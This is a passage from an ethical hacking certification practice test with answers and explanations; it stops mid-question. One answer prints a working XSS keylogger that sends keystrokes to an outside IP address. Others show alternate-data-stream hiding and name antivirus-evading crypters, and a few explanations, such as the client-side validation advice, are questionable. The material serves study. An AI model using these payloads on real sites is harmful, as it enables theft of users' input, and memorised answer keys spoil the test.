Ethical Hacking - C701 Kaplan Practice Test 1/2


Which attack vector commonly uses covert channels?

Trojan malware Malware, specifically Trojans, use covert channels for transmission to avoid intrusion detection systems. Covert channels hide processes and other data within another protocol, also called tunneling. Covert channels are unauthorized, while overt channels are legitimate communication paths. Trojans can also use covert channels to modify critical OS files, disable firewalls and antivirus software, and create backdoors for remote access.

You are a security analyst evaluating possible threats using Blackberry mobile devices. Which best describes a blackjacking attack?

Using a mobile app to gain access to internal networks A blackjacking attack uses a mobile app to gain access to the internal networks. To allow easy deployment of mobile apps to Blackberry devices, the Blackberry Enterprise Server (BES) has a VPN connection to the corporate network. This allows a mobile app to use that VPN connection to avoid firewalls and access the internal network. You can use the Big Brother message proxy (BBProxy) tool to perform a blackjacking attack by forwarding messages from the BES to other servers in the internal network.

You are hardening the CEO's laptop against boot sector viruses by setting the MBR to read-only and enabling password protection in the system BIOS. The BIOS uses a hashing algorithm similar to LAN Manager to generate a checksum that is stored on the FlashROM. Based on the following checksums, which password is the most secure?

0x0182bd0bd4444bf836077a718ccdf409 The most secure password is the one with the checksum 0x0182bd0bd4444bf836077a718ccdf409, because it is at least 8 characters long. The LM hashing algorithm is currently disabled in modern Windows systems, but is still used by SMB over TCP and via the NetBIOS API. The algorithm truncates or pads out passwords to 14 uppercase characters and divides the result into two 7-byte halves, which are used to create two DES keys. Then, each DES key is used to encrypt the constant ASCII string KGS!@#$%, generating two 8-byte sections that are concatenated into a single 16-byte number, represented in hexadecimal. The other checksums are not secure because their last 8 bytes are aad3b435b51404ee. This value is generated from LM hash padding when the password is less than 8 characters. All other aspects being the same, a password with a longer length is more secure than shorter-length passwords. Also, passwords must be at least eight characters in length to meet minimal security standards.

Why would an attacker work very slowly when performing a ping scan of the network?

Evade detection by the IDS A hacker would work very slowly when performing a ping scan of the network to evade detection by the IDS. Alert thresholds can be used to reduce the number of alerts the IDS has to store. For example, an IDS can be set to only report the first instance of a violation, but not the next 50 instances. If the hacker performs the scan slowly and the IDS has an alert threshold, it may allow the attacker to evade the IDS by not setting off as many alerts in a time period as a typical ping scan would. An IDS typically recognizes a ping scan by the high number of pings in proportion to unique IP addresses in a short period of time.

Which of the following can NOT be prevented by the security and privacy settings on a client's web browser?

Filtering network packets The security and privacy settings on a client's web browser cannot filter network packets. Firewalls can filter malicious content, including cookies and raw network packets based on IP address and/or TCP/UDP ports.

You would like to encrypt a VPN connection at the Data Link layer of the OSI model. Which protocol should you choose?

PPTP Point-to-Point Tunneling Protocol (PPTP) is a tunneling protocol that operates at the Data Link layer (Layer 2). It uses Microsoft Point-to-Point Encryption (MPPE) to protect the connection.

What type of encryption does the Syskey utility utilize?

RC4 The Syskey utility uses 128-bit RC4 encryption. This utility encrypts hashed password information in a SAM database in a Windows system. RC2 is another algorithm in the RC family that uses 64-bit encryption. It is not used in Syskey. RC5 is another algorithm in the RC family. It is a 32/64/128-bit block cipher developed in 1994. It is not used in Syskey. RC6 is another algorithm in the RC family. It is a 128-bit block cipher based heavily on RC5, and was an AES finalist developed in 1997. It is not used in Syskey.

Which of the following uses 160 bits for hashing?

SHA 1 Secure Hash Algorithm 1 (SHA 1) uses 160 bits for hashing. Cryptographic weaknesses were discovered in SHA-1, and the standard was no longer approved for most cryptographic uses after 2010.

Which statement is FALSE with regard to network address translation (NAT)?

Static NAT uses a one-to-many mapping Static NAT maps a single private IP address to a single public IP address, so it is considered a one-to-one mapping. The types of NAT and the mapping model each uses are:
Port Address Translation (PAT) - many-to-one
Static NAT - one-to-one
Dynamic NAT - many-to-many
When using IPSec, tunnel mode supports NAT, while transport mode does not. Network Address Translation (NAT) translates internal IP addresses to external IP addresses and vice versa. NAT is typically used by firewalls or routers.

You are reviewing a company's backup and recovery procedures. Which of the following practices will increase the likelihood of failure during tape recovery?

Store all tapes in a secured location on site Storing all tapes in a secured location on site will increase the likelihood of failure during tape recovery. Although you should store all tapes in a secured location, you should have a few backup tapes stored off-site in case of a disaster. Performing read-after-write and full verification will decrease the likelihood of failure during tape recovery. Although full verification increases backup time, it reduces the risk of tape failure during recovery.

You need to ensure that malicious packets are prevented from entering your private network. Packets should be evaluated based on the following criteria:
Source IP addresses
Protocol and port number
Which type of security tool will use only these criteria to deny access?

Router ACL A router ACL (access control list) will use the source IP address, protocol, and port number of a packet to deny access. When a router is examining a packet against an access control list, it looks at each rule starting at the top of the rule list. When a match is found, it takes the prescribed action and stops evaluating the packet. For this reason, the order of the rules is very important when you create ACLs on routers.

What is the broadcast address for the subnet 191.43.164.0/22?

191.43.167.255 The broadcast address for 191.43.164.0/22 is 191.43.167.255. This uses the 255.255.252.0 subnet mask. The host address range for this network is 191.43.164.1 - 191.43.167.254. The 191.43.164.255 address is an address that can be used by a host on the network. The 191.43.255.255 address is not part of this address range. The 191.43.165.255 address is an address that can be used by a host on the network.

What is the current recommended RSA key length for a PKI?

2048 bits The CA/B Forum (a consortium of certificate authorities), major browser vendors, and The National Institute of Standards and Technology (NIST) recommend that sub-2048-bit RSA public keys be phased out by the end of 2013. Prior to Dec 13 2013, the recommendation was a key length of 1024 bits. While it is not yet the case, with the increasing computing power available, longer key lengths of 4096 and 8192 bits are inevitable.

Which ISO 27000 standard describes audits and certifications?

27006 The International Organization for Standardization (ISO) standard 27006 describes audits and certifications for security management systems. The ISO 27000 standard series outlines how to best secure a large ISO-compliant organization. ISO 27001 describes how to perform a risk assessment. ISO 27002 describes how to apply security controls after performing the risk assessment described in ISO 27001. ISO 27005 describes how to best manage security risks using an organized and systematic approach.

Your organization implements a network protocol that uses SMB signing. Which attack does this protect against?

A sniffer used to capture password hashes When an organization implements a network protocol that uses SMB signing, it protects against an attacker using a sniffer to capture SMB password hashes and then using those hashes for offline cracking.

Your company has a policy that alternate data streams (ADSs) should be monitored to verify that they do not contain malicious content. Which of the following tools will help you locate ADSs? (Choose all that apply.)

streams.exe, ADS Spy, SFind streams.exe, ADS Spy, and SFind are all tools that will locate ADSs. ADS Spy will even let you delete the data stored in an ADS. AdsCheck.exe is used to determine if a computer supports ADS or not. But AdsCheck.exe will not locate existing ADSs.

Which of the following does a security audit evaluate?

Adherence of a company to its security policy A security audit evaluates the adherence of a company to its stated security policy. It answers the question: "Does the organization do what it says it will do?" The security policy describes the security controls to protect the organization from inside and outside attacks. It includes clear objectives, goals, rules and regulations, and formal procedures to protect its assets from cyber-attacks, malicious threats, and foreign intelligence.

You have been asked to perform a thorough vulnerability assessment for your company's file server. You must ensure that you complete all of the appropriate steps for the assessment. What is the first step or phase?

Acquisition The first phase of a vulnerability assessment is Acquisition. This is where you acquire all the appropriate documentation. The five phases (or steps) of a vulnerability assessment are:
Acquisition
Identification
Analyzing
Evaluation
Generating reports

Which of the following constitutes a vulnerability?

Announcement of a security hole in a product When a security issue is identified with a product, it is a vulnerability.

Which two of the following are goals of key escrow agreements?

Provide third-party access to data, Facilitate recovery operations Key escrow agreements are ones in which copies of private keys used to encrypt data are placed in the safekeeping of a third-party organization. This allows for the recovery of the keys from the third party in the event the keys are lost or deleted. It also provides a mechanism to grant access to the data to other third parties, such as law enforcement performing investigations.

Which layers of the Fibre Channel stack are replaced with Ethernet when using FCoE? (Choose all that apply.)

FC-0, FC-1 Layers FC-0 and FC-1 are replaced with Ethernet when using FCoE (Fibre Channel over Ethernet). FC-0 defines the physical layer, including connectors and optical and electrical signaling, while FC-1 defines the transmission protocol, including serial encoding/decoding and error controls. Both the FC-0 and FC-1 layers are based upon optical fiber connections, while FCoE uses full-duplex Ethernet connections and transmissions. In Ethernet, the physical and data link layers use digital electric signaling and MAC addressing for transmission.

Which wireless encryption mechanism uses AES?

WPA2 Wi-Fi Protected Access 2 (WPA2) uses Advanced Encryption Standard (AES). WPA2 uses Cipher Block Chaining Message Authentication Code Protocol (CCMP) with AES at 128 bits for data confidentiality and Cipher Block Chaining Message Authentication Code (CBC-MAC) for message integrity.

Your company has completed all the appropriate steps to prepare for a potential incident. The next day, a user informs you that the internal Web server is unavailable. When you research the issue, you determine that a Distributed Denial of Service (DDoS) attack has been carried out against the internal Web server. You need to follow the appropriate incident response procedures to recover the internal Web server. What is the first step to perform when an incident has occurred?

Detect and analyze The first step that should be performed when an incident has occurred is detect and analyze. The steps in the incident management process are as follows:
Prepare for incident handling and response
Detect and analyze
Classify and prioritize
Notify
Contain
Investigate
Eradicate and recover
Perform post-incident activities

You need to determine how attackers can evade an intrusion detection system (IDS). Which of the following best describes session splicing?

Fragmenting the attack payload Session splicing fragments the attack payload so that the IDS must reassemble the packets to detect the attack. Session splicing is also known as IP fragmentation. Encoding the attack payload is an IDS evasion technique known as attack obfuscation. Attack obfuscation bypasses the IDS by not following a recognized signature, but is able to attack the target.

A hacker was recently caught trying to deface the web site of a company with which he had serious disagreement concerning their use of certain chemicals in their products. What is this type of hacker called?

Hacktivist A hacktivist is a hacker who seeks to cause some sort of overall change through his efforts, rather than to cause damage or steal something. A cracker is a hacker who is considered to be skilled and intent on damaging something or stealing something.

Of the listed physical security controls, which is usually only deployed in the data center?

Hot and cold aisles Hot and cold aisles are usually only deployed in the data center. They are a cooling technique where air is circulated in a certain manner to provide optimum cooling in the data center.

Recently, your organization was the victim of a social engineering attack. Security guards allowed a power company repairman into the company to supposedly perform some tests. The repairman actually installed a network sniffer on the network. Which type of social engineering attack occurred?

Impersonation The type of social engineering attack that has occurred is impersonation. Impersonation occurs when any attacker pretends to be a legitimate trusted person to gain access to your facility. This includes posing as a legitimate user, as technical support, as a repairman, or as a trusted authority figure. Eavesdropping is a social engineering attack where attackers listen in on conversations or intercept messages between employees.

Which biometric scan focuses on the colored portion of the user's eye?

Iris An iris scan focuses on the ridges in the iris, which is the colored part of the eye. A retina or retinal scan focuses on the unique patterns of the blood vessels in the back of a user's eye.

Which of the following statements is NOT true about RSA SecurID?

It is a form of mutual authentication While RSA SecurID is a form of two-factor authentication (it requires something you know and something you have), it is not mutual authentication. Mutual authentication requires both ends of a connection request to authenticate one another. RSA SecurID only authenticates the user.

A security engineer runs the following Nmap command:
nmap -sn -PE 192.168.1-5
What are the results of this scan?

It will scan all of the hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets. The nmap -sn -PE 192.168.1-5 command will scan all of the hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets. The -PE switch indicates that Nmap will use standard ICMP echo request/responses, while the -sn switch will disable port scanning.

Which of the following tools is used to obfuscate binary code in an executable so that it is undetectable by anti-virus software?

SwayzCryptor SwayzCryptor is used to obfuscate binary code in an executable so that it is undetectable by anti-virus software. Crypters encrypt binary code in executables to hide malware like viruses, keyloggers, and RATs. SwayzCryptor is a fully undetectable (FUD) crypter that can also bind other files and spoof extensions. Other crypters include Hidden Sight Crypter, Galaxy Crypter, Criogenic Crypter, and Heave Crypter.

Which of the following is true of 3DES?

Symmetric algorithm Triple Data Encryption Standard (3DES) is a symmetric algorithm, which means the keys used to encrypt are the same ones used to decrypt. It is not a hashing algorithm. It is used to encrypt data. Hashing is used to maintain the integrity of data. It is not a stream cipher. It is a block cipher, which means it encrypts blocks of data, while a stream cipher encrypts on a bit-by-bit basis. It is not considered stronger than AES. AES is generally considered to be the strongest and is required for FIPS compliance.

Which attack occurs at the Transport layer of the OSI model?

TCP session hijacking

You need to perform the following tasks:
Identify all resources on a target system.
Identify the potential threats to each resource on the system.
Determine a mitigation strategy to handle serious and likely threats.
What is the name of this process?

Vulnerability assessment The name of this process is vulnerability assessment. It is commonly implemented using an automated scanning tool that relies on a database of common vulnerabilities.

Your company provides a user feedback form that includes a comment field. Currently, comment data is received using a <textarea> element without any front-end or back-end validation. Which of the following JavaScript code would be an example of an attempted XSS KeyLogger attack?

document.onkeypress = function(e) {
    new Image().src = 'http://5.45.64.15/index.php?data=' + encodeURIComponent(e.key);
};
The most significant clue that this JavaScript code is a keylogger is the registration of the onkeypress event handler. The keypress event is fired when any key is pressed while the webpage has the focus. When a key is pressed, the function takes the URI-encoded version of the character and appends it to the attacker's URL. By assigning the URL to an image source, the webpage will silently send the data without requiring the interaction or notification of the web user.

You are identifying system vulnerabilities on a NTFS system. Which of the following command-line statements is an example of alternate data streams (ADS)?

echo bad stuff > good.txt:shh The following command-line statement is an example of alternate data streams (ADS):
echo bad stuff > good.txt:shh
This command-line statement pushes the echo text (bad stuff) into the good.txt file with an alternate stream named shh, not the default primary stream. This technique allows malicious content to be hidden in a file to avoid detection.

Which of the following versions of the Linux firewall is required for Linux kernel versions 2.4x and above?

iptables The latest version of the Linux firewall, and thus the version required for Linux kernel versions 2.4x and above, is iptables. It replaced the program ipchains, which was the proper version for Linux kernel version 2.2x.

You are working with another security professional to design your company's incident response procedures. Which of the following statements is true?

Incident response is part of incident handling, and incident handling is part of incident management Incident response is part of incident handling. In turn, incident handling is part of incident management. Incident management includes vulnerability analysis, artifact handling, announcements, alerts, incident handling, and other incident management services. Incident management ensures that there is a process in place to handle incidents. Incident handling includes triage, reporting and detection, analysis, and incident response. When an incident occurs, the incident handling process begins. Actual incident response occurs during the incident handling process.

You are responsible for reviewing the event logs for several servers. Auditing is enabled on all the computers. Recently during a review, you noticed that there is a four-hour gap in the events contained in the security event log for one server. The security event log contains events before and after the four-hour gap. You check the other logs on the same server and do not notice any time gaps. What is most likely the reason for this time gap in the security event log?

The system was compromised. It is most likely that the system was compromised and the attacker removed data from the security event log. This would prevent you from being able to read the security event logs that occurred during the time in which the system was compromised. The system was running because all the other logs contain events during the time gap. Auditing was enabled because the log contains events both before and after the time gap. If the security event log was full, it would not contain any events after a certain point in time. The scenario specifically stated that the log contains events before and after the time gap.

You are performing a ping sweep to determine the live hosts running in network 204.17.5.0/27. How many possible hosts will be pinged?

30 hosts in 8 subnets There is a possibility that 30 hosts in 8 different subnets will be pinged using network 204.17.5.0/27. In classless inter-domain routing (CIDR) notation, the number after the forward slash (/27) is the number of bits used in the subnet mask (255.255.255.224), with the remaining bits used to define the hosts, subnetwork, and subnetwork broadcast. This subnet mask would take the Class C address of 254 hosts (if using the default subnet mask of 255.255.255.0) and divide it into 8 subnets as follows:
The CIDR notation for 254 hosts in 1 subnet would be 204.17.5.0/24. The default subnet mask for a standard Class C address is 255.255.255.0.
The CIDR notation for 126 hosts in 2 subnets would be 204.17.5.0/25. The subnet mask for this address is 255.255.255.128.
The CIDR notation for 62 hosts in 4 subnets would be 204.17.5.0/26. The subnet mask for this address is 255.255.255.192.
The CIDR notation for 14 hosts in 16 subnets would be 204.17.5.0/28. The subnet mask for this address is 255.255.255.240.

Which port is the most likely to be open on a web server?

80 The authorized port number for HTTP is 80, so it is the most likely to be open on a web server. While it is possible to use another port for HTTP, it is not practical to communicate this fact to all users using a public web server. Therefore, the port must be left open on both the web server and the firewall, creating a ready-made channel to launch an attack. Port 25 is used for Simple Mail Transfer Protocol (SMTP) and is not typically open on the web server. Port 3389 is used for Remote Desktop Protocol (RDP) and is also usually not open in the web server. Port 23 is used for Telnet and is usually not open in the web server. If a command-line connection is required, it will probably use Secure Shell (SSH) on port 22 rather than Telnet, which transmits in clear text.

You are concerned about external hackers gaining control of a new web application. With that threat actor in mind, which of the following tests would be appropriate?

Black box A black box test, one in which the testers are given no information about the application or its environment, would be appropriate. External hackers would be faced with the same lack of information. A gray box test is one in which the testers are given some, but not all, information about the system and its environment. This approach would be appropriate if the concern were with an employee elevating his privileges, as this user would have some knowledge of the application and its environment, although not complete knowledge.

Which of the following would be an appropriate mitigation for tailgating?

Mantrap A mantrap can mitigate tailgating, in which an unauthorized person enters the facility by following an authorized person who has successfully authenticated to the physical access system. A mantrap is a two-door system with a small room between them. This allows each person entering to be visually verified.

You are running a penetration test for a small IT service provider during normal operating hours. Which of the following activities is most likely to be restricted in the rules of engagement (ROE)? (Choose all that apply.)

Password cracking, Distributed denial of service Activities like password cracking and distributed denial of service (DDoS) could be deemed too intrusive or detrimental to normal business operations, especially if tests are run during regular business hours. DDoS could be disallowed outright, while password cracking may be limited to prevent exhaustive brute force attacks that could impact system responses. The ROE (rules of engagement) documentation provides an ethical hacker the scope of targets and allowed testing techniques and tools. It also includes specific IP address ranges, testing periods, contact information for the team and affected systems and networks, prevention measures for alerting law enforcement, and how collected information will be handled after testing.

Your software company has recently implemented an IaaS solution with a cloud service provider. Multiple web sites use PKI to provide user account security to your customers. Which component(s) are the responsibility of your company to manage? (Choose all that apply.)

Private key, Digital signature Your company must manage the private key and digital signature in PKI, even when leveraging a cloud service provider for virtual infrastructure. In PKI, the only component that must be stored and managed by a public-facing application or web site is the private key of the public/private key pair associated with the digital certificate. A copy of the private key may also need to be stored by a key escrow for third-party access or recovery. The company can also use the private key to create a digital signature for identity purposes on all communication, encrypted or not.

You are reviewing source code for any buffer overflow vulnerabilities. The following C++ source code handles data extracted from a compressed file:
if (extractedDataLength < 65536) {
    // Break down data into multiple chunks
} else {
    // Handle data in one large chunk
}
The data should be broken down into multiple chunks only when the buffer of 65,536 characters is reached or exceeded. How should you modify the condition in the first line of the code?

Change to extractedDataLength >= 65536 You should replace the first line with the condition extractedDataLength >= 65536 so that the data is broken down into multiple chunks only if the buffer size is reached or exceeded. The >= operator means "greater than or equal to." You should not replace the first line with the condition extractedDataLength <= 65536 because this condition will break down the data into multiple chunks if it is less than or equal to the buffer size. You should not replace the first line with the condition extractedDataLength > 65536 because this condition will break down the data into multiple chunks if the data is greater than the buffer size, but not when the data is equal to the buffer size. You should not replace the first line with the condition extractedDataLength == 65536 because this condition will break down the data into multiple chunks only if it is equal to the buffer size, not when the data is greater than the buffer size.

Which of the following is NOT a threat on a Windows file server because of a missing security patch vulnerability?

Copying sensitive data to a USB drive While the copying of sensitive data to a USB drive is a concern that should be addressed through the control of the use of USB ports, this threat is not because of security patches. Security patches cannot address a setting (like use of USB ports) which must remain under the control of the enterprise. Missing security patches can cause the following to occur:
Exposure of sensitive files
Improper access to databases
Exposure of passwords

Alice frequents coffee shops, libraries, and other public areas where your company's remote employees typically work. Alice knows that the username and password employees use to log in to their laptops are the same credentials used to access the company's virtual private network (VPN). When an employee first arrives and pulls out a laptop, Alice will position herself in a seat behind that employee. When the employee enters the login credentials to unlock the laptop, Alice will look over the employee's shoulder to see the username and which keys are typed for the password. What should the company do to prevent this shoulder surfing attack?

Create and enforce a physical security policy for remote employees. You should create and enforce a physical security policy for remote employees. Next, you should follow through with security awareness training on the new security policy. The security policy should be kept up-to-date, and any updates should be shared with all employees on an ongoing and regular basis.

As a security professional for your company, you must perform routine network analysis. Today you must perform a traffic capture using tcpdump. You run the tcpdump -w /log command. What does this command do?

Creates a binary log file in a specific folder. The tcpdump -w /log command creates a binary log file in a specific folder, in this case /log. The tcpdump -r file_name command will read packets from a particular file. The tcpdump -i int_name command will capture packets from the specified interface. The tcpdump host host_name command will capture packets from the specified host.

You need to perform a thorough audit of your company's infrastructure configuration. The proposed security policy will require detailed vulnerability assessment and compliance with industry-accepted best practices, including SOX and PCI. Enterprise assessments, reporting, and patch management must be centralized. Which tool will BEST meet these requirements?

Ecora Auditor Professional The best tool to meet these requirements is the Ecora Auditor Professional. This vulnerability management system uses a non-agent architecture to discover, collect, analyze, and report configuration data across an enterprise infrastructure. Its features include centralized configuration auditing, change management, compliance policy reporting for standards like SOX, PCI, GLBA, and HIPAA, and IT configuration analysis against industry standards like ITIL, CobiT, NIST, and ISO 1779.

You run the following command on a Windows computer:
FOR /L %H IN (1 1 10) DO ping -n 1 192.168.1.%H | FIND /I "reply"
What is the result?

Enumeration of the alive systems in the first ten IP addresses in the 192.168.1.0 network via ICMP Running the given command would enumerate the alive systems in the first ten IP addresses in the 192.168.1.0 network via ICMP. The FOR command syntax is as follows:
FOR /L %parameter IN (start step end) DO command
This FOR command uses the /L switch to specify a list enumeration for the %H parameter, starting at 1, incrementing by 1, and ending at 10 for the last octet of the target IP address in the ping command. The -n switch on the ping command specifies a single packet to send. The pipe operator (|) sends the output to the FIND command, which searches it for a reply.

Which of the following is NOT an advantage to using SOAP?

Faster than the CORBA standard Simple Object Access Protocol (SOAP) is NOT faster than CORBA, because it utilizes a verbose XML format. XML takes longer to parse than binary. SOAP is platform-independent, simplifies communications, and leverages multiple transport protocols. Common Object Request Broker Architecture (CORBA) is a standard defined by the Object Management Group (OMG). It is also designed to facilitate the communication of systems that are deployed on diverse platforms.

You are investigating a Perl script that contains the following code: my $user = $q->param('username'); my $pwd = $q->param('password'); my $sth = $dbh->prepare("SELECT authcode FROM customers WHERE uname = '$user' AND pwd = '$pwd'"); $sth->execute(); Which modification(s), if any, should you make to prevent SQL injection attacks?

Filter user input with client-side validation and use parameter placeholders. You should filter user input with client-side validation and use parameter placeholders to prevent SQL injection attacks. Filtering user input based on size and data type can be performed using JavaScript, reducing server-side processing and the possibility of malicious content. Using parameter placeholders, rather than dynamic SQL statements, will ensure that the input is validated before the statement is executed. To implement placeholders in Perl DBI, you would modify the last two lines as follows: my $sth = $dbh->prepare("SELECT authcode FROM customers WHERE uname = ? AND pwd = ?"); $sth->execute($user, $pwd); Modification is necessary because the Perl script concatenates the query parameters directly into the SQL statement. This is the textbook case of code vulnerable to SQL injection attacks.

Which device uses rule-based access control?

Firewalls Firewalls use rule-based access control. So do routers. This is accomplished by configuring both allow and deny rules on the device. Client and server computers use mandatory or discretionary access controls based on the needs of the company. Switches usually implement mandatory or discretionary access control as well.

Your company has implemented a virtualization solution to isolate software environments and establish access levels for internal employees. Which of the following software are vulnerable to a VM-level attack? (Choose all that apply.)

Hyper-V ESXi Both ESXi and Hyper-V are hypervisors that could be the target of VM-level attacks. A hypervisor is software that manages virtual machines on a host machine by providing the bridge between the hardware and the guest operating systems. ESX/ESXi is a popular native hypervisor for the VMware platform, while Hyper-V is offered by Microsoft. In a VM-level attack, the hacker targets a known vulnerability in the hypervisor software and could gain unauthorized access to hardware and guest operating systems, even if those virtualized operating systems are hardened.

As an ethical hacker, you are using Nmap port scanning and must try to evade a certain type of device. You are using the following techniques:
Break the network scans up into smaller ranges, with delays in between each scan.
Break up IP packets into fragments.
Which type of device are you most likely attempting to evade?

IDS You are most likely attempting to evade an intrusion detection system (IDS). IDSs can often detect when an attacker is using an Nmap port scan. These techniques are intended to evade IDSs, so that they are unaware of potential attackers.

You perform a ping and receive the following results:
Pinging 192.168.10.1 with 32 bytes of data:
Reply from 192.168.10.1: bytes=32 time=5ms TTL=60
Reply from 192.168.10.1: bytes=32 time=1ms TTL=60
Reply from 192.168.10.1: bytes=32 time=1ms TTL=60
Reply from 192.168.10.1: bytes=32 time=1ms TTL=60
During a routine ping test later in the week, you receive a reply packet from the IP address 192.168.10.1, but the TTL value is now 40. What is the most likely reason for this discrepancy?

IP spoofing The most likely reason for the discrepancy in the TTL values is IP spoofing. The initial TTL (time to live) value differs by protocol, but common values like 64, 128 and 255 are used. Normally, the TTL of the reply packet should start at the same initial value as the request packet's TTL. So, the difference between the two TTL values should be the hop count. One way of detecting IP spoofing is to verify that the TTL of the reply packet matches the request TTL minus the hop count. This is not a perfect detection, because TTLs can vary based on traffic patterns, especially if going across the internet.

During a risk assessment, which of the following roles is responsible for providing the security architecture to the risk assessor?

IT security analyst The IT security analyst (sometimes also referred to as a system owner) will provide a description of the security architecture to the risk assessor. Of the available choices, the IT security analyst would be in the best position to speak to the relative strengths and weaknesses of a system's security architecture. The chief information officer (CIO) is in charge of planning and budgeting for the information systems and is not typically close enough to identify the strengths and vulnerabilities of individual systems, or of the overall architecture the systems create, to provide an analysis of the security architecture to the risk assessor. The business manager or functional manager is in charge of ensuring systems and information assets for a unit are used to accomplish business objectives. The business manager typically has neither the technical insight nor the access to the system required to provide an analysis of the security architecture to the risk assessor. The facilities manager can speak to physical risks to the facility but has neither the technical insight nor the access to the system required to provide an analysis of the security architecture to the risk assessor.

Your IT security team defends against privilege escalation with the following countermeasures:
Encryption for sensitive company data
Services run as unprivileged accounts
Multi-factor authentication and authorization
Which additional countermeasure would BEST enhance the current defense?

Limit interactive logon privileges To best enhance the defense against privilege escalation, you should limit interactive logon privileges. Restricting users to the least privileges required to effectively do their job will prevent an attacker from gaining administrative access from a low-level account.

A systems administrator reports to you that an attacker used a TOR proxy to carry out an attack against your network. What does this proxy provide to the attacker?

Location anonymity A TOR (The Onion Routing) proxy can be used by an attacker to provide location anonymity. This is because packets are routed through many different proxy servers. So when tracing the path of the packet, you will simply locate another proxy server when tracing each source in the traffic chain. A TOR proxy does not provide packet fragmentation, overlapping fragments, or payload obscurity. Packet fragmentation occurs when the attack payload is split into multiple small packets. Overlapping fragments occur when an attacker crafts a series of packets with TCP sequence numbers that overlap. Payload obscurity occurs when the attack is encoded so that the target computer will reverse the encoding, but the IDS will not detect it, thereby allowing the encoded payload to pass.

Jim is working all night as the security administrator. He makes note of some unusual network activity at about 3 AM. Based on the unusual activity, Jim suspects an attack is underway, but he has no other evidence. How should Jim react to the situation?

Log what has occurred, consult the security policy, and act accordingly The purpose of a detailed security policy is to provide guidance to individuals in just such a situation. It should be the first item consulted whenever a technician is presented with a situation in which he is not quite sure how to act, and it should attempt to anticipate as many scenarios as possible. He should not immediately call the incident response team UNLESS that is what is called for in the security policy. He should not simply log what has occurred and continue administrative duties. He should consult the security policy and act accordingly. That may mean he should log the event and move on, but only after confirming this is the specified action to take.

You have been hired as an ethical hacker by a company. During your initial meeting, you are given several guidelines that must be complied with by the company's security, including HIPAA. Which type of company has MOST likely hired you?

Medical You are most likely working for a medical company. The Health Insurance Portability and Accountability Act (HIPAA) affects any companies that may be dealing with medical records. None of the other company types is likely because HIPAA is involved. Ethical hackers must be familiar with any laws, regulations, or standards that affect the industries for which they work. In addition to HIPAA, these include:
Payment Card Industry Data Security Standard (PCI-DSS) - affects any organizations that handle credit cardholder information.
ISO/IEC 27001:2013 - provides guidelines on information security management systems for all types of organizations.
Sarbanes Oxley (SOX) Act - provides guidelines for financial reporting for any publicly traded company.
Digital Millennium Copyright Act (DMCA) - provides copyright protections for intellectual property.
Federal Information Security Management Act (FISMA) - provides information security control guidelines for federal organizations and agencies.

Which of the following statements BEST describes disgruntled employees?

Most serious threat the organization faces Disgruntled employees pose the most serious threat to the organization. This is because they have already scanned, enumerated, and gained access to the network. They can now continue to the later steps of the hacking methodology to escalate privileges and execute applications.

Your company has a monthly requirement to test corporate compliance with host application usage and security policies. You need to use the appropriate tool to fulfill this requirement.

Nessus You should use a vulnerability scanner like Nessus to test corporate compliance with host application usage and security policies. This tool is used to examine your network for any vulnerabilities. A network sniffer like Wireshark is used to capture packets that are on your network.

Which of the following actions does vulnerability scanning NOT perform?

Notifies of threats based on active attack signatures A vulnerability scanner does not notify of threats based on active attack signatures. This is the role of an intrusion detection system (IDS). Vulnerability scanners, like Nessus, utilize automated processes to gather information on single systems or the entire network, such as open ports and running services, application and services configuration errors, applications, services, and other network vulnerabilities. They can also operate proactively to locate issues when they occur.

You are a network security analyst for your company. You perform the following scan from a remote machine: nmap -sX 141.8.225.72 You use Wireshark to capture the response packets. How do you determine which ports are open?

On Linux/Unix machines, there is no response. On Linux/Unix machines, there is no response. This Nmap scan uses the -sX switch, which is an Xmas scan. An Xmas scan sets at least the FIN, URG and PUSH flags on the TCP frame. Because their implementation of the TCP/IP stack conforms strictly to RFC 793, Linux/Unix machines will send no response if a port is open, but will send a RST response if the port is closed. On Windows machines, there is no response from either open or closed ports. Xmas scans are only intended for Linux/Unix machines that are compliant with RFC 793.

Joe, who does not work for your company, was able to steal an employee badge from a car in the parking lot and use it to enter the facility. What type of threat does Joe present?

Outside affiliate Joe would be considered an outside affiliate threat. Insider threats can be organized into four categories as described in the list below:
Pure insider - an employee with all the rights and access associated with being employed by the company.
Insider affiliate - a spouse, friend, or even client of an employee who uses the employee's credentials to gain access.
Outside affiliate - non-trusted outsiders who use open access to gain access to an organization's resources. A great example of this is an outsider gaining unauthorized access to wireless access points.
Insider associate - someone with limited authorized access. Contractors, guards, and cleaning and plant services all fit under this category.

You need to send an encrypted message to another user. Both you and the recipient have private and public keys. As the sender, you must obtain the recipient's public key to send the message. Which cryptographic technology are you most likely using?

PGP PGP (Pretty Good Privacy) is most likely the cryptographic technology being used. The OpenPGP standard involves the use of digital certificates, compression, and private and public keys to reduce the sniffing threats. Private key encryption is often referred to as symmetric encryption, and public key encryption is often referred to as asymmetric encryption.

You are an ethical hacker. You recently gained consent from an online healthcare service company to begin a series of penetration tests. These tests should only be performed during off-peak hours on Saturday and Sunday, so as not to greatly affect existing patients. You identify a SQL injection vulnerability in the account logon form. Which of the following actions would most likely NOT violate your professional code of conduct?

Perform a Boolean-based blind SQL injection attack, and include the results in the audit report. Performing a Boolean-based blind SQL injection attack and including the result in the audit report will most likely NOT violate your professional code of conduct. This is because existing customers are less likely to be impacted by this action and less confidential information is being recorded in the audit report. An ethical hacker should always consult the rules of engagement (ROE) before proceeding with any activities, however. The ROE is guideline documentation for performing the penetration test, including allowed activities like port scanning, social engineering, and network sniffing, and restricted activities like password cracking and SQL injection attacks. It is possible in this scenario that even performing a SQL injection attack is forbidden. Even if it is not, going beyond the initial testing may go beyond agreed-upon limits.

You are heading a committee that is responsible for creating your company's security policies. What should you do FIRST?

Perform a risk assessment When creating your company's security policies, you should first perform a risk assessment. This involves identifying the risks that your company and network face and then prioritizing these risks. You should identify the assets as part of the risk assessment. The steps for creating security policies are as follows:
Perform a risk assessment.
Collect standard guidelines to use as guides.
Include senior management in the policy development.
Set clear penalties and enforce them.
Make the final version of the policies available to staff.
Ensure that every staff member reads, signs, and understands the policies.
Deploy tools to enforce the policies.
Train and educate users about the policies.
Review and update the policies on a regular basis.

Your company has deployed a signature-based anti-virus application on all of its computers. You are concerned that there will be new viruses created that the application cannot detect. Which of the following virus types is most likely to evade detection by the anti-virus application?

